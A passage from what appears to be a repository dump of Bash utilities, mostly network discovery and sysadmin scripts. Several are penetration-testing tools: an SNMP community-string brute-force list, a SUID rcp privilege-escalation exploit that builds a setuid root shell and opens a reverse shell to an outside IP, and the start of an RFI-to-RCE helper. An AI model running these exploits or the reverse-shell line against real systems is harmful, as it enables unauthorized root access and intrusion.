 98 |     CMD: sudo gem install snmp\n"
 99 | 		exit 1
100 | 	else
101 | 		return 1
102 | 	fi
103 | 
104 | }
105 | 
106 | function validate_start {
107 | 	
108 | 	# Validate start parameter is an integer between 1 and 254
109 | 	if [ -z "$start" ]; then
110 | 		START=1
111 | 	elif [ "$start" -lt 255 ] && [ "$start" -ge 1 ] || ERROR="Start parameter needs to be an integer between 1 and 254"; then
112 | 		if [ ! $ERROR ]; then
113 | 			START=$start
114 | 		else
115 | 			printf "$ERROR\n"
116 | 			exit 1
117 | 		fi
118 | 	fi
119 | 
120 | }  # End function validate_start
121 | 
122 | 
123 | function validate_end {
124 | 	# Validate positional parameter 3 is an integer between $2 and 254
125 | 	if [ -z $end ] && [ -z $start ] ; then
126 | 		END=254
127 | 	elif [ -z $end ] && [ -n $start ]; then
128 | 		END=$start
129 | 	elif [ "$end" -lt 255 ] && [ "$end" -ge "$start" ] || ERROR="Last ending IP address needs to be an integer between the value of $start and 254"; then
130 | 		if [ ! $ERROR ]; then
131 | 			END=$end
132 | 		else
133 | 			printf "$ERROR\n"
134 | 			exit 1
135 | 		fi
136 | 	fi
137 | 
138 | }  # End function validate_end
139 | 
140 | 
141 | function validate_ipv4 {
142 | 	# Verifying $ipv4 value"
143 | 	if [[ "$ipv4" =~ "$IPV4REGEX" ]] || IPERROR="Valid IP subnet was not defined. For more help execute 'massnmp -h' Example 172.16.32 "; then
144 | 		if [ ! "$IPERROR" ]; then
145 | 			printf "[x] A valid network value was not defined, you entered $ipv4. Used -h for more info. Example: 172.16.0\n"
146 | 			exit 1
147 | 		fi
148 | 	fi
149 | 
150 | }  # End function validate_ipv4
151 | 
152 | 
153 | function validate_snmp_version {
154 | 	# Ensures a valid SNMP version was selected
155 | 	case $version in
156 | 		"1")
157 | 			printf "[*] Using SNMP version $version \n"
158 | 			;;
159 | 		"2c")	printf "[*] Using SNMP version $version \n"
160 | 			;;
161 | 		*)
162 | 			printf "[x] SNMP version (-v) must be 1 or 2c\n"
163 | 		        exit 1	
164 | 			;;
165 | 	esac
166 | }
167 | 
168 | 
169 | function create_community_list {
170 | 	# Create community list
171 | 	if [ ! -f "$file" ]; then
172 | 		CLIST="/tmp/community.lst"
173 | 		echo $'private\npublic\nmanagerpublic\n0\n0392a0\n1234\n2read\n4changes\nANYCOM\nAdmin\nC0de\nCISCO\nCR52401\nIBM\nILMI\nIntermec\nNoGaH$@!\nOrigEquipMfr\nPRIVATE\nPUBLIC\nPrivate\nPublic\nSECRET\nSECURITY\nSNMP\nSNMP_trap\nSUN\nSWITCH\nSYSTEM\nSecret\nSecurity\ns!a@m#n$p%c\nSwitch\nSystem\nTENmanUFactOryPOWER\nTEST\naccess\nadm\nadmin\nagent\nagent_steal\nall\nall private\nall public\napc\nbintec\nblue\nc\ncable-d\ncanon_admin\ncc\ncisco\ncommunity\ncore\ndebug\ndefault\ndilbert\nenable\nfield\nfield-service\nfreekevin\nfubar\nguest\nhello\nhp_admin\nibm\nilmi\nintermec\ninternal\nl2\nl3\nmanager\nmngt\nmonitor\nnetman\nnetwork\nnone\nopenview\npass\npassword\npr1v4t3\nproxy\npubl1c\nread\nread-only\nread-write\nreadwrite\nred\nregional\nrmon\nrmon_admin\nro\nroot\nrouter\nrw\nrwa\nsan-fran\nsanfran\nscotty\nsecret\nsecurity\nseri\nsnmp\nsnmpd\nsnmptrap\nsolaris\nsun\nsuperuser\nswitch\nsystem\ntech\ntest\ntest2\ntiv0li\ntivoli\ntrap\nword\nwrite\nxyzzy\nyellow' > $CLIST
174 | 		printf "[*] Using 121 of the most common SNMP community strings defined in $CLIST\n"
175 | 	else
176 | 		CLIST="$file"
177 | 		printf "[*] Using the community list defined in $CLIST\n"
178 | 	fi
179 | }
180 | 
181 | 
182 | function create_ipv4_list {
183 | 	# Create file containing desired ipv4 address range if it doesnt exist
184 | 	for ip in $(seq $START $END); do 
185 | 	    echo $ipv4.$ip
186 | 	done  > /tmp/ip.lst
187 | }
188 | 
189 | 
190 | function discover_snmp_hosts {
191 | 	# Discovering SNMP enabled hosts
192 | 	printf "[*] Discovering SNMP enabled hosts\n"
193 | 	onesixtyone -c "$CLIST" -i "$TMPPATH/ip.lst" -o "$TMPPATH/snmp_hosts.txt" 1>/dev/null
194 | 		
195 | 	SNMP_HOSTS=$(cat "$TMPPATH/snmp_hosts.txt" | awk {'print $1 $2'} | sort | uniq)
196 | 	printf "\n#====================#\n|   SNMP Discovery   |\n#====================#\n"
197 | 	echo $SNMP_HOSTS
198 | 
199 | 	printf "\nEnumerating SNMP info from discovered devices. Please wait...\n"
200 | 	for i in $(/usr/bin/cat /tmp/snmp_hosts.txt | /usr/bin/awk {'print $1'}); do 
201 | 		IP=($(/usr/bin/cat /tmp/snmp_hosts.txt | /usr/bin/awk {'print $1'}))
202 | 		COMMUNITY=($(cat "$TMPPATH/snmp_hosts.txt" | awk {'print $2'} | tr -d '[]'))
203 | 
204 | 		snmp-check -c $COMMUNITY -p 161 -v1 $IP > "$i-snmp$version.txt" 2>&1 || snmp-check -c $COMMUNITY -p 161 -v2c $IP > "$i-snmp$version.txt" 2>&1
205 | 	done
206 | 
207 | 	printf "\n[*] OneSixtyOne Results\n"
208 | 	cat "$TMPPATH/snmp_hosts.txt" | sort | uniq
209 | 	printf "\n[*] View Detailed SNMP Info in Below Files\n"
210 | 	ls *-snmp$version.txt
211 | }
212 | 
213 | function remove_files {
214 | 	# Removes files that were created to run commands
215 | 	rm -rf -- "$TMPPATH/ip.lst" "$TMPPATH/snmp_hosts.txt"
216 | }
217 | 
218 | 
219 | while [ ! -z "$1" ]; do
220 | 	case "$1" in
221 | 		-n)
222 | 		        shift
223 | 			ipv4=$1
224 | 			;;
225 | 		-s)
226 | 			shift
227 | 			start=$1
228 | 			;;
229 | 		-e)
230 | 			shift
231 | 			end=$1
232 | 			;;
233 | 		-v)	shift
234 | 			version=$1
235 | 			;;
236 | 		-f)	shift
237 | 			file=$1
238 | 			;;
239 | 		*)
240 | 			print_usage
241 | 			;;
242 | 	esac
243 | shift
244 | done
245 | 
246 | 
247 | allow_ctrlc
248 | verify_tools
249 | validate_ipv4
250 | validate_start
251 | validate_end
252 | validate_snmp_version
253 | create_community_list
254 | create_ipv4_list
255 | discover_snmp_hosts
256 | 


--------------------------------------------------------------------------------
/newusercheck.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | # Send an email alert if a new account is added to the /etc/passwd file
 3 | # CRONJOB BELOW RUNS EVERY 5 MINUTES
 4 | # */5 * * * * /bin/bash /root/scripts/newusercheck.sh 1>/dev/null 2>/dev/null
 5 | 
 6 | 
 7 | HOSTNAME=$(hostname)
 8 | TO="<to@domain.com>"
 9 | FROM="<from@domain.com>"
10 | USERLIST="/root/scripts/.user.lst"
11 | NEWUSERLIST="/root/scripts/.userlist.txt"
12 | PASSWDFILE="/etc/passwd"
13 | COMPARE=0
14 | 
15 | trap "/bin/rm -rf --preserve-root -- $NEWUSERLIST" 0
16 | 
17 | 
18 | if [ -s "$USERLIST" ] ; then
19 | 	/usr/bin/printf "[*] Checking previously known list of users\n"
20 | 	LASTREV="$(/bin/cat $USERLIST)"
21 | 	COMPARE=1
22 | fi
23 | 
24 | 
25 | /usr/bin/printf "[*] Obtaining current user list\n"
26 | /bin/cat $PASSWDFILE | /usr/bin/cut -d: -f1 > $NEWUSERLIST
27 | 
28 | 
29 | CURRENT="$(/bin/cat $NEWUSERLIST)"
30 | 
31 | 
32 | if [ $COMPARE -eq 1 ] ; then
33 | 	if [ "$CURRENT" != "$LASTREV" ] ; then
34 | 		/usr/bin/printf "[!] WARNING: password file has changed\n"
35 | 		/usr/bin/diff $USERLIST $NEWUSERLIST | /bin/grep '^[<>]' | /bin/sed 's/</Removed: /;s/>/Added:/'
36 |     
37 |     /usr/bin/printf "[*] Sending email alert\n"
38 | 		/usr/bin/mail -r $FROM -A $NEWUSERLIST -s "WARNING: New Account Created on $HOSTNAME" $TO <<< "You are receiving this email because a new user account has been created on $HOSTNAME. Attached to this email is a file containing the CURRENT user accounts on the system. The user list has been updated so you will not receive this alert until an account is created again."
39 |     
40 |     /usr/bin/printf "[!] WARNING: Previously known user list has been updated so you do not keep receiving this warning\n" 
41 |     /bin/mv $NEWUSERLIST $USERLIST
42 | 	else
43 | 		/usr/bin/printf "[*] No new users have been created since the last check\n"
44 | 	fi
45 | else
46 | 	/usr/bin/printf "[*] Creating initial database of previously known users\n"
47 | 	/bin/mv $NEWUSERLIST $USERLIST
48 | fi
49 | 
50 | /bin/chmod 600 $USERLIST
51 | 
52 | exit 0
53 | 


--------------------------------------------------------------------------------
/pingsweep.sh:
--------------------------------------------------------------------------------
  1 | #!/bin/bash
  2 | 
  3 | 
  4 | IPV4REGEX="^[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}$"
  5 | PINGCMD=$(command -v fping)
  6 | USAGE="Syntax: $0 [-h] -i <network> [-s <int32 starting port>] [-e <int32 ending port>]
  7 | 
  8 | OsbornePro pingsweep 2.1 ( https://osbornepro.com )
  9 | NOTE: This command is most efficient on Linux distros that have fping installed
 10 | 
 11 | Usage: pingsweep -i <string format is #.#.#> [[-s <start address>] [-e <end address>]]
 12 | 
 13 |     OPTIONS:
 14 |         -h : Displays the help information for the command.
 15 | 	-i : Set the network subnet to perform the ping sweep on
 16 | 	-s : Set the starting IP address to begin the scan from
 17 | 	-e : Set the ending IP Address to scan too. Default
 18 | 
 19 |     EXAMPLES:
 20 |           pingsweep -i 192.168.0
 21 |             # This example performs a ping sweep from 192.168.0.1 to 192.168.0.254
 22 | 
 23 |           pingsweep -i 192.168.0 -s 200
 24 |             # This example performs a ping sweep from 192.168.0.200 to 192.168.0.254
 25 | 
 26 | 	  pingsweep -i 192.168.0 -s 128 -e 192
 27 | 	    # This example performs a ping sweep from 192.168.0.128 to 192.168.0.192
 28 | 	   
 29 | "
 30 | 
 31 | function get_cmd {
 32 | 
 33 | 	# Determines whether fping or ping will be used
 34 | 	if [ -z $PINGCMD ]; then
 35 | 		CMD="ping -s 16 -c 1 -i 1 -U -W 1 \$HOST | grep 'bytes from' &" && echo "[*] fping command NOT found and will NOT be used"
 36 | 	else
 37 | 		CMD="fping -c1 -t300 \$HOST 2> /dev/null 1> /dev/null" && echo "[*] fping command found and will be used"
 38 | 	fi
 39 | 	
 40 | }  # End function get_cmd
 41 | 
 42 | 
 43 | function allow_ctrlc {
 44 | 
 45 | 	# Allow Ctrl+C to kill pingsweep
 46 | 	trap '
 47 | 	  trap - INT # restore default INT handler
 48 | 	  kill -s INT "$$"
 49 | 	' INT
 50 | 
 51 | }  # End function allow_ctrlc
 52 | 
 53 | 
 54 | function print_usage {
 55 | 
 56 | 	printf "$USAGE\n" >&2
 57 | 	exit 1
 58 | 
 59 |     }  # End function print_usage	
 60 | 
 61 | 
 62 | function validate_start {
 63 | 	
 64 | 	# Validate start parameter is an integer between 1 and 254
 65 | 	if [ -z "$start" ]; then
 66 | 		START=1
 67 | 	elif [ "$start" -lt 255 ] && [ "$start" -ge 1 ] || ERROR="Start parameter needs to be an integer between 1 and 254"; then
 68 | 		if [ ! $ERROR ]; then
 69 | 			START=$start
 70 | 		else
 71 | 			printf "$ERROR\n"
 72 | 			exit
 73 | 		fi
 74 | 	fi
 75 | 
 76 | }  # End function validate_start
 77 | 
 78 | 
 79 | function validate_end {
 80 | 	
 81 | 	# Validate positional parameter 3 is an integer between $2 and 254
 82 | 	if [ -z "$end" ]; then
 83 | 		END=254
 84 | 	elif [ "$end" -lt 255 ] && [ "$end" -gt "$start" ] || ERROR="Last ending IP address needs to be an integer between the value of $start and 254"; then
 85 | 		if [ ! $ERROR ]; then
 86 | 			END=$end
 87 | 		else
 88 | 			printf "$ERROR\n"
 89 | 			exit
 90 | 		fi
 91 | 	fi
 92 | 
 93 | }  # End function validate_end
 94 | 
 95 | 
 96 | function validate_ipv4 {
 97 | 
 98 | 	echo "[*] Verifying $ipv4 value"
 99 | 	if [[ "$ipv4" =~ "$IPV4REGEX" ]] || IPERROR="Valid IP subnet was not defined. For more help execute 'pingsweep -h' Example 172.16.32 "; then
100 | 		if [ ! "$IPERROR" ]; then
101 | 			printf "[x] A valid network value was not defined, you entered $ipv4. Used -h for more info. Example: 172.16.0\n"
102 | 			exit 1
103 | 		fi
104 | 	fi
105 | 
106 | }  # End function validate_ipv4
107 | 
108 | 
109 | function execute_pingsweep {
110 | 
111 | 	printf "[*] Starting Ping Sweep\n"
112 | 	echo -e "------------\nActive Hosts\n------------"
113 | 
114 | 	for i in $(seq $START $END 2> /dev/null); do
115 | 		HOST=$(echo $ipv4.$i)
116 | 			eval $CMD
117 | 			if [ "$?" = 0 ]; then
118 | 				printf "$HOST\n"
119 | 			fi
120 | 	done
121 | 
122 | 	printf "[*] Ping Sweep execution completed\n"
123 | 
124 | }  # End function execute_pingsweep
125 | 
126 | 
127 | while [ ! -z "$1" ]; do
128 | 	case "$1" in
129 | 		-i)
130 | 		        shift
131 | 			ipv4=$1
132 | 			;;
133 | 		-s)
134 | 			shift
135 | 			start=$1
136 | 			;;
137 | 		-e)
138 | 			shift
139 | 			end=$1
140 | 			;;
141 | 		*)
142 | 			print_usage
143 | 			;;
144 | 	esac
145 | shift
146 | done
147 | 
148 | get_cmd
149 | allow_ctrlc
150 | validate_ipv4
151 | validate_start
152 | validate_end
153 | if [ -z $PINGCMD ]; then
154 | 	execute_pingsweep | grep bytes | cut -d" " -f4 | cut -d":" -f1
155 | else
156 | 	execute_pingsweep
157 | fi
158 | 
159 | 


--------------------------------------------------------------------------------
/pingsweep_img.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/tobor88/Bash/d85ae7d3c5bf9db82797fafa2d0c40ca27babb17/pingsweep_img.png


--------------------------------------------------------------------------------
/portscan.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | 
 3 | IPV4REGEX="^[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}$"
 4 | USAGE="Syntax: $0 [-h] -n <network> -p <int32 ports>
 5 | OsbornePro portscan 1.1 ( https://osbornepro.com )
 6 | 
 7 | Usage: portscan -n <string format is #.#.#> -p [int array]
 8 | 
 9 |     OPTIONS:
10 |         -h : Displays the help information for the command
11 | 	-n : Set the hostname or ip address to test for open ports on
12 | 	-p : Set the ports to check
13 | 	-t : Set the timeout value for testing connections
14 | 
15 |     EXAMPLES:
16 |           portscan -n 192.168.0.1 -p 22 -t 1
17 | 	  # This examples tests for port 22 being open on 192.168.0.1 using a 1 second timeout
18 | "
19 | 
20 | 
21 | function allow_ctrlc {
22 | 
23 | 	# Allow Ctrl+C to kill pingsweep
24 | 	trap '
25 | 	  trap - INT # restore default INT handler
26 | 	  kill -s INT "$$"
27 | 	' INT
28 | 
29 | }  # End function allow_ctrlc
30 | 
31 | 
32 | 
33 | function print_usage {
34 | 
35 | 	printf "$USAGE\n" >&2
36 | 	exit 1
37 | 
38 | }  # End function print_usage	
39 | 
40 | 
41 | 	
42 | function validate_port {
43 | 	
44 | 	if ((65535 <= $port)); then
45 | 		printf "[x] Port needs to be between 1 and 65535\n"
46 | 		exit 1
47 | 	fi
48 | 
49 | }  # End function validate_port
50 | 
51 | 
52 | function test_port {
53 | 
54 | 	(timeout $timeout bash -c "cat < /dev/null > /dev/tcp/$ipv4/$port") && printf "[*] Port $port is open on $ipv4\n" 
55 | 
56 | }  # End function test_port
57 | 
58 | 
59 | 
60 | while [ ! -z "$1" ]; do
61 | 	case "$1" in
62 | 		-n)
63 | 		        shift
64 | 			ipv4=$1
65 | 			;;
66 | 		-p)
67 | 			shift
68 | 			port=$1
69 | 			;;
70 | 		-t)	
71 | 			shift
72 | 			timeout=$1
73 | 			;;
74 | 		*)
75 | 			print_usage
76 | 			;;
77 | 	esac
78 | shift
79 | done
80 | 
81 | 
82 | 
83 | allow_ctrlc
84 | validate_port
85 | test_port
86 | 


--------------------------------------------------------------------------------
/portscan_img.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/tobor88/Bash/d85ae7d3c5bf9db82797fafa2d0c40ca27babb17/portscan_img.png


--------------------------------------------------------------------------------
/rcp-suid-privesc.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | 
 3 | # According to exploitdb this method does not work in all situations and has only been tested on a version of Red Hat
 4 | 
 5 | RCPFILE="/usr/bin/rcp" ;
 6 | TEST=$(ls -ld $RCPFILE)
 7 | SUIDBIT=$(echo ${TEST:3:1})
 8 | 
 9 | if [ $SUIDBIT != "s" ]; then
10 | 	printf "rcp is not suid, quiting\n" ;
11 | 	exit;
12 | else
13 | 	touch /tmp/shell.c || printf "There was an issue creating shell.c in tmp directory\n"
14 | 	printf "#include<unistd.h>\n#include<stdlib.h>\nint main()\n{" > shell.c
15 | 	printf "    setuid(0);\n\tsetgid(0);\n\texecl(\"/bin/sh\",\"sh\",0);\n\treturn 0;\n}\n" >> shell.c
16 | 	
17 | 	touch caterpillar
18 | # Add you user to the sudo group if you have a password
19 | #	/usr/bin/rcp 'vaterpillar butterfly; chmod -aG wheel username;' 127.0.0.1 2> /dev/null
20 | 
21 | # Create a shell.c binary and run it with the SUID bit set on it
22 | 	/usr/bin/rcp 'caterpillar butterfly; gcc -o /tmp/shell /tmp/shell.c;' 127.0.0.1 2> /dev/null
23 | 	/usr/bin/rcp 'caterpillar butterfly; chmod u+s /tmp/shell;' 127.0.0.1 2> /dev/null
24 | 	/usr/bin/rcp 'caterpillar butterfly; bash -i >& /dev/tcp/192.168.119.172/443 0>&1 && whoami' 127.0.0.1 2> /dev/null
25 | 	printf "Launch /tmp/shell\n" ;
26 | 
27 | 	/tmp/shell
28 | fi
29 | 


--------------------------------------------------------------------------------
/readid.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | 
 3 | # readid.sh is used to make the contents of /etc/passwd, /etc/group, and /etc/shadow easy to interpret quickly
 4 | 
 5 | if [ -z "$1" ]
 6 | then
 7 | 	echo "Use -h switch to view help information"
 8 | 	echo ""
 9 | fi
10 | 
11 | while [ -n "$1" ]; do
12 | 	case "$1" in
13 | 		-u)
14 | 			# This option is used to read the contents of /etc/passwd and place its output into an easy to read format
15 | 			awk -F":" '
16 | 			BEGIN {
17 | 			print "==================================================================================================================="
18 | 			printf "%-18s %-5s %-5s %-35s %-22s %-22s\n" , "USER", "UID", "GID", "GROUP", "HOME", "SHELL"
19 | 			print "===================================================================================================================" }
20 | 			NR==1,NR==400{ printf "%-18s %5d %5d %-35s %-22s %-22s\n" , $1,$3,$4,$5,$6,$7 } ' /etc/passwd
21 | 			;;
22 | 		-g) param="$2"
23 | 			# This option is used to read the contents of the /etc/group file and place its output into an easy to read format
24 | 			awk -F":" '
25 | 			BEGIN {
26 | 			print "==================================================================================================================="
27 | 			printf "%-28s %-5s %-5s %-35s\n" , "GROUP_NAME", "   PWD", "  GID", " MEMBERS"
28 | 			print "===================================================================================================================" }
29 | 			NR==1,NR==400{ printf "%-28s %5d %5d %-35s\n" , $1,$2,$3,$4 } ' /etc/group
30 | 			;;
31 | 		-s) param="$3"
32 | 			# This option is used to read the contents of the /etc/shadow file and requires root permissions
33 | 			awk -F":" '
34 | 			BEGIN {
35 | 			print "================================================================================================================================================="
36 | 			printf "%-18s %-98s %-10s %-10s\n" , "USER", "PASSWORD_HASH", "LAST_CHANGED", "INACTIVE", "EXPIRY"
37 | 			print "=================================================================================================================================================" }
38 | 			NR==1,NR==400{ printf "%-18s %-98s %-10s %-10s\n" , $1,$2,$3,$7,$8 } ' /etc/shadow
39 | 			;;
40 | 		-h) param="$4"
41 | 			# This option displays a help message and command execution examples
42 | 			echo ""
43 | 			echo "OsbornePro readid 1.0 ( https://osbornepro.com )"
44 | 			echo ""
45 | 			echo "Usage: readid '[Options'] "
46 | 			echo ""
47 | 			echo "OPTIONS:"
48 | 			echo " -u : Reads the /etc/passwd file and places it into a neat table."
49 |   			echo " -g : Reads the /etc/group file and places it into a neat table."
50 | 			echo " -h : Displays the help information for the command."
51 | 			echo ""
52 | 		        echo "EXAMPLES:"
53 | 			echo "  readid -u"
54 | 			echo "  readid -g"
55 | 			echo "  sudo readid -s"
56 | 			echo "  readid -h"
57 | 			echo "  readid -u | more"
58 | 			echo ""
59 | 			;;
60 | 	esac
61 | 	shift
62 | done
63 | 


--------------------------------------------------------------------------------
/readid_img.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/tobor88/Bash/d85ae7d3c5bf9db82797fafa2d0c40ca27babb17/readid_img.png


--------------------------------------------------------------------------------
/renew_wildcard_cert_cf_dns.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | # This script is used to request a wildcard certificate from LetsEncrypt when Cloudflare is your DNS hosting provider
 3 | # This script also sets up a renewal cronjob for the wildcard certificate
 4 | 
 5 | 
 6 | if [ "$EUID" -ne 0 ]; then
 7 |     echo "[x] Script must be executed as root"
 8 |     echo "    EXAMPLE CMD: sudo $0"
 9 |     exit
10 | fi
11 | 
12 | CERTBOT_INSTALLED=$(apt-cache policy certbot | grep Installed | grep none)
13 | if [ -n $CERTBOT_INSTALLED ]; then
14 |     echo "[*] The certbot binary is not installed. Installing now."
15 |     apt-get update && apt-get install -y certbot python3-certbot-dns-cloudflare
16 | fi
17 | 
18 | 
19 | echo "[*] Setting required variables"
20 | CF_API_KEY="<Your-Global-API-Key-From-Cloudflare-Here>"
21 | CF_EMAIL="Your-Cloudflare-Email-Here@domain.com"
22 | CF_DOMAIN="your-domain.com"
23 | CONFIG_FILE="/etc/letsencrypt/cloudflare.ini"
24 | CERT_DIRECTORY="/etc/letsencrypt/archive/${CF_DOMAIN}"
25 | 
26 | 
27 | echo "[*] Building authentication file"
28 | echo "dns_cloudflare_api_key = $CF_API_KEY" > $CONFIG_FILE
29 | echo "dns_cloudflare_email = $CF_EMAIL" >> $CONFIG_FILE
30 | 
31 | 
32 | echo "[*] Setting secure file permissions on the config file"
33 | chown root:root $CONFIG_FILE
34 | chmod 600 $CONFIG_FILE
35 | 
36 | 
37 | echo "[*] Requesting wildcard certificate"
38 | certbot certonly --dns-cloudflare --dns-cloudflare-credentials "$CONFIG_FILE" -d "*.$CF_DOMAIN" -d "$CF_DOMAIN" --agree-tos -m "$CF_EMAIL" --server https://acme-v02.api.letsencrypt.org/directory
39 | 
40 | 
41 | echo "[*] Updating cronjob"
42 | echo "0 0 * * 0 /usr/bin/certbot renew --quiet" > /etc/cron.d/letsencrypt
43 | 


--------------------------------------------------------------------------------
/replace_nagioscore_logo.sh:
--------------------------------------------------------------------------------
  1 | #!/bin/bash
  2 | # This script is used to replace the logo used on a Nagios Core servers web GUI logos with your own image
  3 | 
  4 | USAGE="
  5 | SYNTAX: $0 [-h] -u <url> | [ -f <file> ]
  6 | 
  7 | DESCRIPTION:
  8 |    This script is used to replace the Nagios Core web GUI logos with your company logo. 
  9 |    There are two logos to replace. The loging logo and the smaller logo you see after sign in.
 10 | 
 11 | REQUIREMENTS:
 12 |    1.) Access to a website hosting or a file location for your company logo
 13 |    2.) Wget or Curl command to download files
 14 |    3.) PNG file type logo
 15 |    4.) Not required but for asthetics the dimensions should be 142x40
 16 | 
 17 | CONTACT INFORMATION
 18 |    Company: OsbornePro LLC.
 19 |    Website: https://osbornepro.com
 20 |    Author: Robert H, Osborne
 21 |    Contact: rosborne@osbornepro.com
 22 | 
 23 | USAGE: $0 [-u <url>] [-f <file path>] [[-m]||[-s]]
 24 | 
 25 |     OPTIONS:
 26 |         -h : Displays the help information for the command.
 27 |         -u : Set the URL to download your logo file from
 28 |         -f : Set the path to your logo file
 29 |         -m : Replace only the Nagios Core Login logo (Anything under 500 pixels width and height should look pretty good)
 30 |         -s : Replace only the Nagios Core GUI logo in the top left of window after logging in (Recommended size is 142x40)
 31 | 	
 32 |     EXAMPLES:
 33 |         $0 -u https://customwebsite.domain.com/your-logo.png
 34 |         # This example replaces the both the main Nagios Core login logo and small in the GUI logo with a company logo downloaded from https://customwebsite.domain.om/your-logo.png
 35 | 
 36 |         $0 -f ~/Pictures/logo.png
 37 |         # This example replaces the both the main Nagios Core login logo and small in the GUI logo with a company logo using the file ~/Pictures.logo.png
 38 |         
 39 | 	$0 -u https://customwebsite.domain.com/your-logo.png -m
 40 |         # This example replaces the main Nagios Core login logo with a company logo downloaded from https://customwebsite.domain.om/your-logo.png
 41 | 
 42 |         $0 -f ~/Pictures/logo.png -s
 43 |         # This example replaces the small GUI Nagios Core logo with a company logo using the file ~/Pictures.logo.png
 44 | 
 45 | "
 46 | 
 47 | # VARIABLES
 48 | NAGIOSLOGOFILES=("/usr/local/nagios/html/images/sblogo.png" "/usr/local/nagios/share/images/sblogo.png" "/var/www/html/images/sblogo.png" "/usr/local/nagios/html/images/logofullsize.png" "/usr/local/nagios/share/images/logofullsize.png" "/var/www/html/images/logofullsize.png")
 49 | DLFILE="/tmp/company-logo.png"
 50 | 
 51 | # FUNCTIONS
 52 | function allow_ctrlc {
 53 | 
 54 |         # Allow Ctrl+C to stop execution
 55 |         trap '
 56 |           trap - INT # restore default INT handler
 57 |           kill -s INT "$$"
 58 |         ' INT
 59 | 
 60 | }  # End function allow_ctrlc
 61 | 
 62 | function print_usage {
 63 | 
 64 |         printf "$USAGE\n" >&2
 65 |         exit 1
 66 | 
 67 | }  # End function print_usage
 68 | 
 69 | function get_download_command {
 70 | 
 71 |         if which wget > /dev/null; then
 72 |                 wget --no-check-certificate $URL -O $DLFILE
 73 | 
 74 |         elif which curl > /dev/null; then
 75 |                 curl -skL $URL -O $DLFILE
 76 | 
 77 |         else
 78 |                 printf "[x] You do not have a way to download your image file. Install wget or curl and try again. \n\tDEBIAN: sudo apt update && sudo apt install -y wget \n\tFEDORA: sudo dnf install -y wget"
 79 |                 exit 1
 80 | 
 81 |         fi
 82 | 
 83 | }  # End function get_download_command
 84 | 
 85 | function verify_file_type {
 86 | 
 87 |         FILEID=$(file "${DLFILE}" | cut -d" " -f2)
 88 |         if [ "${FILEID}" != "PNG" ]; then
 89 |                 printf "[x] You are required to use a PNG file type \n"
 90 |                 exit 1
 91 | 
 92 |         fi
 93 | 
 94 | }  # End function verify_type
 95 | 
 96 | function backup_nagios_logo {
 97 | 
 98 |         if [ -f "$NAGIOSLOGOFILES" ]; then
 99 |                 printf "[*] Backing up original Nagios Core logo files \n"
100 |                 for F in "${NAGIOSLOGOFILES[@]}"; do
101 | 			if [ -f "${F}.orig" ]; then
102 | 				cp "${F}" "${F}.bak"
103 | 
104 | 			else
105 |                         	cp "${F}" "${F}.orig"
106 | 
107 | 			fi
108 |                 done
109 |         else
110 |                 printf "[x] Expected sblogo.png Nagios Logo file was not found at  \n"
111 |                 exit 1
112 | 		
113 |         fi
114 | 
115 | }  # End function backup_nagios_logo
116 | 
117 | function update_logo {
118 | 
119 |         if [ -f $DLFILE ]; then
120 |                 printf "[*] Updating the Nagios Core web GUI logo with your image \n"
121 |                 for F in "${NAGIOSLOGOFILES[@]}"; do
122 |                         cp "${DLFILE}" "${F}"
123 |                 done
124 | 
125 |         elif [ -f $LOGOFILE ]; then
126 |                 printf "[*] Updating the Nagios Core web GUI logo with your image \n"
127 |                 for F in "${NAGIOSLOGOFILES[@]}"; do
128 |                         cp "${LOGOFILE}" "${F}"
129 |                 done
130 | 		
131 |         else
132 |                 printf "[x] Unable to find the replacement logo file \n"
133 | 		
134 |         fi
135 | 
136 | }  # End function update_logo
137 | 
138 | function file_cleanup {
139 | 	
140 | 	if [ -f "${DLFILE}" ]; then
141 | 		rm -rf -- "${DLFILE}"
142 | 
143 | 	fi
144 | 	printf "[*] You will need to restart the hosting web service (apache,nginx,etc.) to display your new logo \n"
145 | 
146 | }  # End function file_cleanup
147 | 
148 | 
149 | # EXECUTION
150 | while [ ! -z "$1" ]; do
151 |         case "$1" in
152 |                 -u)
153 |                         shift
154 |                         URL=$1
155 |                         get_download_command
156 |                         wait
157 |                         verify_file_type
158 |                         ;;
159 |                 -f)
160 |                         shift
161 |                         LOGOFILE=$1
162 | 			;;
163 | 		-m)
164 | 			shift
165 | 			NAGIOSLOGOFILES=("/usr/local/nagios/html/images/logofullsize.png" "/usr/local/nagios/share/images/logofullsize.png" "/var/www/html/images/logofullsize.png")
166 | 			;;
167 | 		-s)
168 | 			shift
169 | 			NAGIOSLOGOFILES=("/usr/local/nagios/html/images/sblogo.png" "/usr/local/nagios/share/images/sblogo.png" "/var/www/html/images/sblogo.png")
170 | 			;;
171 |                 *)
172 |                         print_usage
173 |                         ;;
174 |         esac
175 | shift
176 | done
177 | 
178 | allow_ctrlc
179 | backup_nagios_logo
180 | update_logo
181 | file_cleanup
182 | 


--------------------------------------------------------------------------------
/rfi-rce.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/tobor88/Bash/d85ae7d3c5bf9db82797fafa2d0c40ca27babb17/rfi-rce.png


--------------------------------------------------------------------------------
/rfi-rce.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | #
 3 | # This bash script is used for simplifying RCE through an RFI.
 4 | # https://roberthosborne.com/f/directory-traversal
 5 | #
 6 | # REQUIREMENTS
 7 | #   - This requires a file on the attack machince containing the RCE "<?php print shell_exec("cmd");?>"
 8 | #   This file is updated with every command executed and is what allows for the simplified RCE.
 9 | #   - curl is not required but should be installed to obtain the most from this tool. Chances are you're on Kali anyway
10 | 
11 | # Allow Ctrl+C to kill pingsweep
12 | trap '
13 |   trap - INT # restore default INT handler
14 |   kill -s INT "$$"
15 | ' INT
16 | 
17 | if [ -z "$1" ] || [ "$1" == '-h' ] || [ "$1" == '--help' ] ; then
18 |                 # This option displays a help message and command execution examples
19 |                 echo ""
